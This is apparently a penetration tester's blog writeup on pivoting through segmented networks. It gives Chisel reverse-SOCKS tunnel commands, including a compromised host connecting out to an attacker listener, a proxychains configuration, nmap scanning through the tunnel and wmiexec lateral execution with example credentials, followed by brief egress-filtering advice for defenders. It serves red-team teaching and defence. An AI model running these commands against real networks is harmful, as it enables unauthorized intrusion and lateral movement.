← Return to All Security Writeups
Offensive Operations MEDIUM • 9 min read • October 1, 2026 • 7 views • 0 likes

Internal Pivoting & Lateral Movement: Chaining Chisel, Proxychains & WMI Exec

#Network Pivoting #Chisel #Proxychains #WMI #Defense Evasion
Internal Pivoting & Lateral Movement: Chaining Chisel, Proxychains & WMI Exec
Executive Synopsis

Field operations methodology for pivoting through deeply segmented enterprise perimeters. Establishing encrypted SOCKS5 tunnels over HTTP/WebSocket and orchestrating multi-hop lateral movement.

Operational Context



In modern red team assessments, dual-homed bastion hosts serve as the gateway between external DMZs and isolated internal segments. This guide outlines the execution of reliable, low-overhead SOCKS5 pivoting using Chisel and Proxychains.

---

Step 1: Deploying the Chisel Relay



On our external control listener:
# Start Chisel Server in reverse SOCKS mode
chisel server --port 8000 --reverse --socks5


On the compromised perimeter node (Linux / Windows):
# Connect back over outbound HTTP/80
./chisel client 203.0.113.50:8000 R:1080:socks


This establishes an encrypted WebSocket tunnel mapping remote SOCKS5 traffic directly to port 1080 on our attacking machine.

---

Step 2: Routing Tools Through /etc/proxychains4.conf



Configure the proxy chain configuration:
[ProxyList]
socks5  127.0.0.1 1080


Now, standard tools seamlessly operate within the internal target network:
# Port scan internal host through the tunnel
proxychains4 nmap -sT -Pn -p 22,80,445,3389 172.16.50.15

Lateral execution via WMI

proxychains4 python3 wmiexec.py CORP/svc_admin:'SecretPass'@172.16.50.15


---

Key Takeaways for Defenders

- Egress filtering is crucial: Disallow arbitrary outbound connections on unmonitored ports from perimeter systems. - Monitor for anomalous long-lived HTTP/WebSocket connections from DMZ servers.
Did this research assist your operations?

React with a like to endorse this technical walk-through and help fellow security researchers.

Authored By
Omar Adel Mahmoud
Penetration Tester & Security Researcher